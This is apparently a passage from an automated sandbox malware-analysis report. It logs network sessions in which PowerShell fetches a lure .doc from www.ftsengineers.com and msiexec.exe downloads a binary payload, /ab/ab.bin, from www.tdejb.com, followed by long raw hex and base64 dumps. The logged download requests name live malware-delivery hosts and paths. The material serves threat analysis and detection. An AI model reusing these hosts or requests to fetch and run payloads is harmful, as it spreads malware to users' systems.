                                                                                                                                                          2024-12-19 11:50:59 UTC8000INData Raw: 57 61 63 7a 6a 41 30 33 33 73 68 33 39 68 6e 33 55 32 6a 74 79 42 6b 55 2f 68 46 33 2f 38 37 33 7a 4c 52 4f 33 57 68 57 6f 49 6f 70 45 65 52 35 48 77 41 39 35 51 41 76 49 72 78 36 73 55 4c 47 61 52 4a 62 42 67 79 61 46 79 35 46 59 74 54 57 36 52 35 57 65 36 2f 2f 46 79 4a 35 78 44 4c 5a 36 79 78 77 6b 4e 62 6b 77 4b 48 6a 6c 48 36 30 7a 50 51 51 73 6b 48 55 6c 61 76 4c 57 54 6d 56 46 78 47 42 2f 4e 6e 55 76 76 4d 76 37 4e 4c 43 39 41 4c 67 75 37 77 4d 62 45 52 70 45 68 4b 6d 54 30 53 45 58 55 44 2b 57 45 4c 5a 50 51 53 51 78 6f 74 69 78 69 76 45 7a 4a 58 42 7a 38 72 71 2f 74 35 73 73 2f 54 35 77 36 30 35 48 4a 41 4a 36 4f 44 79 64 37 59 76 54 61 66 5a 53 65 4d 66 61 39 38 6a 42 52 31 36 46 62 37 66 4c 7a 64 54 6e 49 42 6c 6c 2f 30 74 56 79 35 64 75 41 4e
                                                                                                                                                          Data Ascii: WaczjA033sh39hn3U2jtyBkU/hF3/873zLRO3WhWoIopEeR5HwA95QAvIrx6sULGaRJbBgyaFy5FYtTW6R5We6//FyJ5xDLZ6yxwkNbkwKHjlH60zPQQskHUlavLWTmVFxGB/NnUvvMv7NLC9ALgu7wMbERpEhKmT0SEXUD+WELZPQSQxotixivEzJXBz8rq/t5ss/T5w605HJAJ6ODyd7YvTafZSeMfa98jBR16Fb7fLzdTnIBll/0tVy5duAN
                                                                                                                                                          2024-12-19 11:50:59 UTC8000INData Raw: 58 4d 41 30 59 38 7a 2b 31 79 34 4e 59 70 4c 5a 71 52 49 61 6c 57 6c 30 31 52 41 75 6a 5a 76 65 64 41 64 48 44 6f 4f 62 42 34 36 56 51 46 4b 44 75 66 56 70 62 39 43 43 6f 36 66 79 68 56 32 46 75 49 62 6c 31 77 37 42 64 6c 61 30 6e 73 6b 6b 35 37 48 64 6b 38 47 62 35 55 51 4b 72 34 46 75 53 57 2b 33 55 34 6c 76 74 31 4f 4a 65 51 38 53 4f 34 76 2f 51 68 78 63 75 33 75 65 50 53 7a 49 67 74 4c 32 45 45 6c 71 46 5a 4f 4a 62 37 64 54 69 57 2b 33 55 35 32 61 75 74 42 4e 4f 2b 4c 51 44 78 79 43 69 79 4b 62 6a 51 32 45 59 4d 42 57 4d 4c 74 76 42 68 35 6b 6a 35 7a 32 6f 71 51 69 55 6b 38 41 34 74 6c 49 32 73 45 6a 64 64 61 75 57 4c 74 5a 70 33 50 77 67 58 50 7a 6f 64 39 6b 35 6b 2f 48 67 6e 31 33 6a 6e 48 48 6e 6e 69 38 53 4a 78 38 74 4c 67 48 6a 35 41 53 35 62 64
                                                                                                                                                          Data Ascii: XMA0Y8z+1y4NYpLZqRIalWl01RAujZvedAdHDoObB46VQFKDufVpb9CCo6fyhV2FuIbl1w7Bdla0nskk57Hdk8Gb5UQKr4FuSW+3U4lvt1OJeQ8SO4v/Qhxcu3uePSzIgtL2EElqFZOJb7dTiW+3U52autBNO+LQDxyCiyKbjQ2EYMBWMLtvBh5kj5z2oqQiUk8A4tlI2sEjddauWLtZp3PwgXPzod9k5k/Hgn13jnHHnni8SJx8tLgHj5AS5bd
                                                                                                                                                          2024-12-19 11:50:59 UTC8000INData Raw: 42 54 51 4f 47 77 34 4a 58 4d 59 57 2b 77 46 51 70 68 68 56 41 6a 39 6e 35 71 2f 34 32 62 6c 44 68 58 33 41 63 67 70 30 49 51 58 70 45 6c 2f 2b 4c 38 32 69 68 2b 63 66 43 72 4d 41 6a 38 30 4b 6f 76 78 33 63 2f 4d 34 4a 56 39 41 75 78 42 78 38 65 2f 31 39 4f 67 54 61 5a 4d 37 56 72 6a 63 55 37 32 75 32 58 49 33 48 77 36 53 61 4c 4d 73 39 42 78 56 2f 35 47 6c 62 50 41 6f 61 71 35 7a 38 37 6f 74 44 36 6b 6d 6f 56 65 6c 38 39 45 74 44 4f 41 4a 6e 4a 66 6f 76 4c 6e 33 6d 36 31 59 6e 2f 59 58 4c 51 59 35 34 54 46 6d 42 66 63 54 69 56 57 59 2f 4d 6d 76 6c 54 37 54 37 7a 64 54 71 78 34 45 66 72 32 77 64 68 6c 36 31 7a 66 65 64 52 69 74 7a 6e 33 45 47 49 48 52 69 41 30 72 78 2b 79 56 57 43 41 50 72 4b 77 69 43 2b 41 48 49 32 2f 77 71 48 39 67 4b 61 58 77 55 77 47
                                                                                                                                                          Data Ascii: BTQOGw4JXMYW+wFQphhVAj9n5q/42blDhX3Acgp0IQXpEl/+L82ih+cfCrMAj80Kovx3c/M4JV9AuxBx8e/19OgTaZM7VrjcU72u2XI3Hw6SaLMs9BxV/5GlbPAoaq5z87otD6kmoVel89EtDOAJnJfovLn3m61Yn/YXLQY54TFmBfcTiVWY/MmvlT7T7zdTqx4Efr2wdhl61zfedRitzn3EGIHRiA0rx+yVWCAPrKwiC+AHI2/wqH9gKaXwUwG
                                                                                                                                                          2024-12-19 11:50:59 UTC8000INData Raw: 53 69 45 78 64 65 78 68 32 5a 32 79 54 68 64 43 46 5a 2f 76 4b 6b 59 38 47 76 67 75 6d 74 48 6e 50 46 57 42 58 48 71 64 4d 55 55 70 48 31 62 7a 79 42 58 58 49 31 68 78 54 6a 6f 4b 6f 75 73 66 79 57 2b 33 55 34 6c 76 74 31 4f 4a 65 59 64 67 63 74 4d 39 52 35 38 52 63 31 39 65 58 65 2f 66 67 6a 74 45 57 67 42 36 69 4b 51 43 41 71 51 42 49 32 65 44 51 57 75 49 78 56 50 4a 62 34 52 53 36 49 6f 65 47 31 72 41 4b 46 4b 69 36 52 53 46 75 35 57 6d 43 6f 2b 48 4c 5a 4c 2f 57 44 56 47 72 6c 69 6f 4c 47 51 4c 74 31 4f 4a 56 5a 50 6a 69 61 2b 4e 58 68 77 76 74 30 59 6d 78 52 63 77 35 6f 2f 4d 33 6f 6e 73 7a 66 50 30 39 64 76 47 6f 55 2f 47 39 6a 4d 55 42 54 50 79 77 74 6f 6a 52 72 75 51 63 66 46 76 2b 33 54 51 7a 73 46 4d 43 38 74 44 56 74 68 4b 45 72 32 63 2b 2b 50
                                                                                                                                                          Data Ascii: SiExdexh2Z2yThdCFZ/vKkY8GvgumtHnPFWBXHqdMUUpH1bzyBXXI1hxTjoKousfyW+3U4lvt1OJeYdgctM9R58Rc19eXe/fgjtEWgB6iKQCAqQBI2eDQWuIxVPJb4RS6IoeG1rAKFKi6RSFu5WmCo+HLZL/WDVGrlioLGQLt1OJVZPjia+NXhwvt0YmxRcw5o/M3onszfP09dvGoU/G9jMUBTPywtojRruQcfFv+3TQzsFMC8tDVthKEr2c++P
                                                                                                                                                          2024-12-19 11:50:59 UTC8000INData Raw: 45 71 2b 33 55 47 6f 6f 51 71 78 32 74 6a 6b 6e 71 52 4a 69 67 74 34 74 46 69 48 30 33 6f 2b 54 39 30 31 59 42 6b 6e 76 74 33 50 33 45 64 66 4a 6d 78 35 33 54 5a 68 66 31 4c 50 4a 63 34 49 61 32 59 2f 37 55 32 43 54 58 33 50 46 59 71 62 4e 38 45 2b 4a 6b 52 44 53 52 39 72 6c 33 6c 59 53 79 65 2b 33 5a 37 71 41 50 72 4b 79 54 39 59 53 79 65 2b 33 59 33 4b 4e 47 32 34 35 47 70 63 2b 79 43 38 33 55 35 36 46 76 4c 4c 7a 6f 6f 59 49 31 4c 6a 49 6d 79 6c 72 54 79 42 77 7a 46 58 6d 50 31 5a 46 36 32 4d 2b 77 39 69 71 4e 41 70 70 75 44 54 71 68 50 61 6e 46 31 64 78 48 45 37 77 61 39 6f 42 61 6e 76 58 58 51 4c 39 35 4a 51 49 4e 46 57 58 4d 73 67 76 4e 31 4f 45 6c 5a 45 37 4b 46 6b 35 61 74 6c 51 56 42 4c 4a 37 37 64 4f 39 44 59 35 49 56 6c 65 64 33 7a 52 38 6d 39
                                                                                                                                                          Data Ascii: Eq+3UGooQqx2tjknqRJigt4tFiH03o+T901YBknvt3P3EdfJmx53TZhf1LPJc4Ia2Y/7U2CTX3PFYqbN8E+JkRDSR9rl3lYSye+3Z7qAPrKyT9YSye+3Y3KNG245Gpc+yC83U56FvLLzooYI1LjImylrTyBwzFXmP1ZF62M+w9iqNAppuDTqhPanF1dxHE7wa9oBanvXXQL95JQINFWXMsgvN1OElZE7KFk5atlQVBLJ77dO9DY5IVled3zR8m9


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          2192.168.2.449739103.53.42.634437592C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-19 11:51:15 UTC217OUTGET /lm/List%20of%20required%20items%20and%20services.doc HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                                                          Host: www.ftsengineers.com
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          2024-12-19 11:51:18 UTC242INHTTP/1.1 200 OK
                                                                                                                                                          Date: Thu, 19 Dec 2024 11:51:16 GMT
                                                                                                                                                          Server: Apache
                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                          Last-Modified: Wed, 11 Dec 2024 15:12:05 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 29184
                                                                                                                                                          Content-Type: application/msword
                                                                                                                                                          2024-12-19 11:51:18 UTC7950INData Raw: d0 cf 11 e0 a1 b1 1a e1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 3e 00 03 00 fe ff 09 00 06 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 34 00 00 00 00 00 00 00 00 10 00 00 36 00 00 00 01 00 00 00 fe ff ff ff 00 00 00 00 33 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                          Data Ascii: >463
                                                                                                                                                          2024-12-19 11:51:18 UTC8000INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          2024-12-19 11:51:18 UTC8000INData Raw: 65 2f 74 68 65 6d 65 2f 74 68 65 6d 65 31 2e 78 6d 6c 50 4b 01 02 2d 00 14 00 06 00 08 00 00 00 21 00 0d d1 90 9f b6 00 00 00 1b 01 00 00 27 00 00 00 00 00 00 00 00 00 00 00 00 00 eb 09 00 00 74 68 65 6d 65 2f 74 68 65 6d 65 2f 5f 72 65 6c 73 2f 74 68 65 6d 65 4d 61 6e 61 67 65 72 2e 78 6d 6c 2e 72 65 6c 73 50 4b 05 06 00 00 00 00 05 00 05 00 5d 01 00 00 e6 0a 00 00 00 00 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 20 73 74 61 6e 64 61 6c 6f 6e 65 3d 22 79 65 73 22 3f 3e 0d 0a 3c 61 3a 63 6c 72 4d 61 70 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6f 70 65 6e 78 6d 6c 66 6f 72 6d 61 74 73 2e 6f 72 67 2f 64 72 61 77 69 6e 67 6d 6c 2f 32 30 30 36 2f 6d 61 69 6e 22
                                                                                                                                                          Data Ascii: e/theme/theme1.xmlPK-!'theme/theme/_rels/themeManager.xml.relsPK]<?xml version="1.0" encoding="UTF-8" standalone="yes"?><a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"
                                                                                                                                                          2024-12-19 11:51:18 UTC5234INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          3192.168.2.449754202.71.109.2284437256C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-12-19 11:51:38 UTC167OUTGET /ab/ab.bin HTTP/1.1
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                                                                          Host: www.tdejb.com
                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                          2024-12-19 11:51:39 UTC223INHTTP/1.1 200 OK
                                                                                                                                                          Date: Thu, 19 Dec 2024 11:51:38 GMT
                                                                                                                                                          Server: Apache
                                                                                                                                                          Last-Modified: Tue, 03 Dec 2024 03:27:16 GMT
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 449600
                                                                                                                                                          Connection: close
                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                          2024-12-19 11:51:39 UTC7969INData Raw: e4 47 1f 45 3d dd a3 e0 6d 19 db 76 50 37 22 40 fe 29 88 ff 9c 7c 0b 11 04 fc dc ee e6 0b c2 1d 5b 94 dc 82 ef c4 e7 1d a6 e1 fc 84 69 99 af 58 1e ab b9 4a 0e e6 e3 79 a1 6a 74 10 24 8a a5 2d 99 5f fa f9 c4 a1 54 94 8c 94 52 0a 80 b8 26 bd 1e c1 35 f2 74 cf a0 2d 09 a9 df 4e 72 07 af 69 cf 13 e3 0d 6c dc c7 08 65 4d 87 fd 1e 2a a4 07 d2 85 a5 7c af 18 58 d6 ba 87 3d 88 2e 1d 14 a3 fe 66 f0 79 4c 83 90 93 0e e0 9d 4f ba 29 bb e4 92 a6 c0 1c e2 c6 08 f3 81 d7 02 23 81 aa ba 4e 27 17 4d 26 b2 ff c2 bf b0 a6 81 b2 f1 71 1f 79 99 0e c2 4f 27 85 34 34 7c 30 d9 12 e9 25 80 c6 b0 59 04 58 35 50 ed 39 a6 ec d5 7a ad 85 7b 00 f9 03 d9 7f 04 ea fc ec 2f 3d c7 fd 5c 46 c3 3f 1a fb b9 21 ab 26 0a ec 6c ee ec 9c 7a e5 08 31 cb 0a 50 64 fd ae 9e a5 ee 74 60 6e 6d a3 0c
                                                                                                                                                          Data Ascii: GE=mvP7"@)|[iXJyjt$-_TR&5t-NrileM*|X=.fyLO)#N'M&qyO'44|0%YX5P9z{/=\F?!&lz1Pdt`nm
                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: 94 c8 5a df 80 bd 7e 84 86 d2 d4 7b 9c af fc 68 81 ad ee 90 97 14 86 8b 6f a7 bd 94 80 a5 ad 7e 12 f9 d6 1c d9 51 c5 35 ab c2 e1 47 a1 0c bb ec e3 30 b7 01 ca 08 82 16 56 50 6c ed 85 59 04 b0 6c 70 10 91 07 29 70 f8 17 cd 02 00 77 d1 3d ab 55 b4 d1 eb e0 0d 83 b4 34 92 41 f5 5a 49 54 56 84 1d d9 1b 28 d9 15 1c ac f0 99 11 0a c4 7a 86 4d 78 5d 9a 8b 6d 42 19 d9 19 18 d6 40 9d ec 84 5a 94 1a b7 b3 6f b5 74 03 c4 f6 9e ae ac 28 3c e0 18 d9 b7 f2 fe 5f 7b b5 4c 35 bc 5e 97 72 67 f4 58 8f 9b 02 9b d1 a4 ec c5 08 c0 ab 9a 40 92 ef bc b2 3c 4b 7e 94 dd f2 bf cc 23 89 ad 77 cc ec 20 43 63 b9 b4 f5 b6 e7 48 a1 72 fd 7e 5e 54 38 f2 40 c6 da 71 6e 3e 45 db 5c 80 09 03 4a b2 ca c3 ce 60 f6 f5 96 ac a7 5e 58 99 69 cb 81 54 92 df a4 6c 1d b7 b3 f8 65 72 f9 1a d7 9b fb
                                                                                                                                                          Data Ascii: Z~{ho~Q5G0VPlYlp)pw=U4AZITV(zMx]mB@Zot(<_{L5^rgX@<K~#w CcHr~^T8@qn>E\J`^XiTler
                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: e6 f2 97 50 41 1c 7e 14 68 71 2e 90 15 88 8e 21 e7 bc ce da cb 8a a9 2f a6 f1 bf f4 22 8e 01 fa 0e ac 90 5a 57 fd 5c 55 62 9c 65 71 cb 28 39 63 6d 26 b2 8b 6d 82 47 04 ec ae 02 55 ce 9e 77 e1 94 76 84 f9 b9 d0 6e de ae 0c 21 d2 c4 c0 93 db 8f 74 92 9f d0 d5 2d 93 83 f1 30 c9 a9 a9 30 98 55 1c aa 25 22 ab 48 b0 d4 2d 60 26 12 2c ff 69 ed c5 96 d1 82 f5 3b 99 fc f3 79 ee 90 f2 d8 92 95 59 09 62 2a 7b 3d 98 6d 74 89 d3 8c 27 ca 9b c4 a1 90 24 c4 81 82 e7 67 e4 b8 b2 df e4 6b bf ee 5f 27 bd c6 ae 60 9c e5 2e 3a 99 d4 ca 64 96 f6 f5 67 bc 3c 9e 6f af ea 29 64 40 65 ea b4 ae 0f 30 c7 3a 23 79 20 7b b4 af e7 f3 46 08 e4 bc 76 a9 a8 f0 71 5b 2f df 16 2e 32 6d 79 5c 5b 0c 97 41 19 58 88 8c ac bd 69 03 9a 13 b4 be 95 7a 16 49 13 cf 1d 46 84 a9 88 7a b8 8f 0d ad f1
                                                                                                                                                          Data Ascii: PA~hq.!/"ZW\Ubeq(9cm&mGUwvn!t-00U%"H-`&,i;yYb*{=mt'$gk_'`.:dg<o)d@e0:#y {Fvq[/.2my\[AXizIFz
                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: 56 8f 45 fb 31 ec 2d 37 05 9d fe f0 18 d8 18 48 d8 37 4f 39 c4 f6 40 ee fe d4 8d fd c8 90 cd 48 94 6e ad 6b 5d 73 62 50 47 d9 ff c4 9f f8 25 2e d3 4c ab 5e 26 3d 59 90 c0 c1 f2 1f 7c 47 e5 5a b8 59 44 9e b1 7f c6 bc 70 35 55 1b b1 4e 13 11 a1 90 64 63 99 6d 20 ff 79 39 66 09 e5 07 70 74 87 f1 f7 1c 9c 74 78 7c 1d 1a 48 15 1e aa 1a 9d 77 83 22 1e 76 85 ca 54 f2 54 a0 7a 88 4c 5e ad 68 20 8d c2 7a 3e d1 a0 81 1a b9 31 b0 a7 70 ea 13 a1 f4 19 5c a8 90 bf 46 c9 ae 94 9b 2b c8 5c 52 fc 06 dc c0 1d 64 34 84 69 84 6c ef c5 d0 1a cc 3b c5 7e c6 86 d4 de bd 17 80 63 3b ac 44 08 1b b0 e3 af fa e0 ba e0 7c 11 76 21 e0 eb 2a 55 19 a8 c5 03 20 6d 81 30 2b 4e d9 c0 55 79 b6 71 79 2a 64 29 91 94 c4 ba a2 68 43 9e 11 45 5e e7 ea c4 47 69 7a 09 e4 3e d3 4d 5d 36 e8 02 ba
                                                                                                                                                          Data Ascii: VE1-7H7O9@Hnk]sbPG%.L^&=Y|GZYDp5UNdcm y9fpttx|Hw"vTTzL^h z>1p\F+\Rd4il;~c;D|v!*U m0+NUyqy*d)hCE^Giz>M]6
                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: 52 d9 1a a5 bb f8 64 b4 28 ae c6 60 db 80 56 85 70 6f 9b ee b1 09 35 47 fe 27 51 5d 6d 61 a8 85 58 e1 4e 14 43 ac d4 9b 4b fe 1c 15 b1 70 68 52 cf 77 61 c9 70 c0 67 e0 69 dc 23 9d c1 45 b8 86 b1 af 3f 51 6a a1 79 c7 df 01 32 64 17 30 98 ba 9b c5 85 15 c7 34 58 c5 70 78 63 55 88 4d a8 34 da ab b3 81 df a0 a0 b1 95 bb 1a 48 93 da b3 c9 e7 df 35 84 3e 05 bc 17 a2 d3 23 02 0b 2a 06 b9 42 92 27 92 80 e7 90 7a 01 88 b9 b3 23 a3 3c 27 9a db ae 05 b3 0e 13 c7 84 c7 10 8e 8a e9 ed a2 48 5c 7d 10 b8 f0 f8 fb cc 9b b6 e4 69 a2 6b 4b 8d a2 84 12 a5 54 6e e9 c6 c9 70 48 b2 61 8a b0 a0 62 56 d6 81 2c ca 6b cb 23 18 79 7b cf fe 54 0e c1 80 84 73 fd 26 02 c3 81 7e 73 2a 89 ee 3b ef 53 c6 6b c3 98 75 ee 23 cc 88 ca 88 78 d6 ee f7 d2 63 4c 5f e9 2a 57 28 4a be 5b ba 2a cd
                                                                                                                                                          Data Ascii: Rd(`Vpo5G'Q]maXNCKphRwapgi#E?Qjy2d04XpxcUM4H5>#*B'z#<'H\}ikKTnpHabV,k#y{Ts&~s*;Sku#xcL_*W(J[*
                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: 97 0c 2e ef fd a9 89 bc 69 4b 8d c4 88 5c 0f dc b5 40 0c d7 e5 82 74 b6 ca 64 25 1f 20 27 28 13 ed 94 4b d5 bd c9 5b fc b1 f3 a2 da e9 13 b0 00 a7 a5 80 fc 7f 3d 46 63 5f c9 d8 66 8c 4f fc f1 90 f3 fe 2c f1 c4 cb 47 79 11 a5 f3 53 4d 74 7d 15 84 c3 ad bc 21 ee 8a 8a dd 57 90 9b 3d bf 69 2c 28 fd a1 6d c1 f2 e6 8b d7 21 8a 74 7d 34 cf 65 ef e2 51 13 97 1e 95 02 32 82 7c bc 9c c4 61 a7 ff 12 0d 9a 49 0d a0 18 9f a2 fc ca 01 fe 0d 95 1d 19 17 4f 01 4b 59 fc fa 52 7c bf e6 f8 10 fb 28 05 0d da 7f b9 3d cc e7 97 fa 93 26 ff 12 23 40 83 3c a2 7d a9 63 f9 81 44 0c 69 be 99 79 e3 7e ff a3 73 bf 9f da 97 ba 4c a7 7f f4 08 fe 19 49 b6 1b 8b ba 59 be 95 d9 13 1d 7f ab cd b2 25 a5 b8 d0 ff bb 5f 30 91 e0 8b bd 9d bd d4 fa 78 a7 27 dc f8 c2 3b 1b 6c 68 84 8b c0 fa 2a
                                                                                                                                                          Data Ascii: .iK\@td% '(K[=Fc_fO,GySMt}!W=i,(m!t}4eQ2|aIOKYR|(=&#@<}cDiy~sLIY%_0x';lh*
                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: 5e e0 34 e6 79 3e d2 8b 8c 98 b5 59 1f b0 00 a9 5f 6e 88 7d 7c 52 06 f2 39 05 b9 3a 82 26 c6 8c a4 fa 7f 38 22 08 1e ae 34 11 e3 ad 1f 74 62 4d 97 ca 29 36 3c 97 63 8c 86 4e ff a7 94 a6 cb fc 26 d5 cc af a3 f1 05 ec 15 f8 c9 34 f1 ec 69 f7 1c 66 36 cd f5 34 de 72 06 d0 1f 2f e9 3d 5c 87 56 fb 22 d3 76 d4 b6 13 de 67 8a 99 61 68 d5 0b 23 ae f4 39 2f 93 2d 68 cd 12 ff 07 10 00 5d 6f 45 4c 9b 78 6e 79 37 bf b2 93 73 39 8a e2 bd ad 20 ef 4d eb ec 08 a8 fb 65 60 ac 93 0c 9f 58 94 fe b7 5f 3b 09 16 ed cf 4b 51 49 cb cf 92 bf 78 4d 8e 6d 60 21 92 44 8b f1 e4 37 4f 15 67 82 68 b3 bd 52 57 32 fd 8e bf 61 75 54 c8 e4 94 d6 8b 20 32 81 ff 98 af 28 47 7f 13 88 c4 64 3e dc 7f 9c f0 1c 35 97 e9 eb b1 db 39 8c 0e c7 d3 ca b5 b3 40 99 21 46 7c b6 82 cd 68 14 40 4d 40 29
                                                                                                                                                          Data Ascii: ^4y>Y_n}|R9:&8"4tbM)6<cN&4if64r/=\V"vgah#9/-h]oELxny7s9 Me`X_;KQIxMm`!D7OghRW2auT 2(Gd>59@!F|h@M@)
                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: 01 b0 75 a0 8f 57 29 8c 6f 5e e2 fc 7a 57 c0 cc d7 d6 69 93 7e a4 92 1a de 46 22 f8 10 65 e9 14 75 7c ad 6f fc 33 b3 3e fc 6f fb 11 54 07 d5 de 01 aa e3 22 03 18 2c 88 bc 3e ad d7 2c 6b 3b 0a c2 73 2d 0e ac 2d b6 b0 f8 3b e3 2f 2b 0f a8 f9 cb 7f 10 d3 e9 7d 92 c1 bb 10 15 4b 85 99 14 35 05 04 ba 3e c6 d5 d8 f5 ce 95 83 0b af 80 27 57 d6 5f b9 f3 a5 ce 70 ea 48 24 eb 2a eb 06 7e 68 1f d4 e2 6d 29 e7 ef 09 b4 4c 57 3a 1f d9 ac 4a 11 84 74 7d 7f df 59 f5 2b 5f 1e 89 ef 1d c4 64 f1 20 a3 dd a8 36 48 5f ff 9f 9d 0e 84 04 aa 8d 2a d4 30 ab 91 c4 33 a3 24 bb f3 41 30 03 d5 ed 8a b4 4a 42 43 8c 67 16 91 dd 15 a6 a3 3f 9d 58 24 a6 a7 8a 70 19 0c 3f 89 31 09 d5 e8 f7 df 10 76 80 4f 23 6c 2e 18 45 af 60 47 52 f5 3d 5f ee 3a 78 2a ae 5d 52 d9 c4 3d 3b 37 37 ab 08 61
                                                                                                                                                          Data Ascii: uW)o^zWi~F"eu|o3>oT",>,k;s--;/+}K5>'W_pH$*~hm)LW:Jt}Y+_d 6H_*03$A0JBCg?X$p?1vO#l.E`GR=_:x*]R=;77a
                                                                                                                                                          2024-12-19 11:51:39 UTC8000INData Raw: 02 41 ff ae ab 1b 6d ae 55 91 14 fd d6 c7 1b 06 b8 51 7c f9 56 87 d5 14 ab d5 77 6d 45 97 63 00 e4 99 19 44 cc 09 80 d2 f3 eb d9 2f bc af dc 6b 3d f4 f6 a3 b7 53 d4 53 c6 86 81 7b 2b b8 56 ed 83 30 a0 c0 40 10 ef 5f b2 9d 48 b6 d0 a7 00 2a 6d 58 46 ba d6 b7 dd 53 65 23 54 22 b4 e6 d1 57 86 54 cc ce dd 51 cb 61 2e d0 20 49 c0 1d 02 ab 00 75 66 95 4a 5b bc 55 df cd 28 2b fd 7a 4d 3c 55 4d 52 27 c3 4d 37 cb a4 d3 15 e1 58 94 34 99 3e ac c8 09 66 e5 38 a8 b7 89 2c 0e 6c 8e 46 65 a1 2e 3b 27 bb 3a 4b 01 75 fb 03 6d ed 31 7c 8f 42 3f 6d a5 fa a7 2b 22 7b fa 6f 1c f2 9e 6b a6 94 94 0f 4d b3 69 65 e2 70 49 8c 75 61 a4 ae 8e 85 2f 34 51 c0 25 2a b2 ee 95 0a 4b 46 44 2b 71 7f fe 13 1e b1 e1 33 db 28 b8 00 8c 49 b9 1a 96 92 0c 83 1e fd fe 67 63 29 72 b4 40 b2 01 51
                                                                                                                                                          Data Ascii: AmUQ|VwmEcD/k=SS{+V0@_H*mXFSe#T"WTQa. IufJ[U(+zM<UMR'M7X4>f8,lFe.;':Kum1|B?m+"{okMiepIua/4Q%*KFD+q3(Igc)r@Q
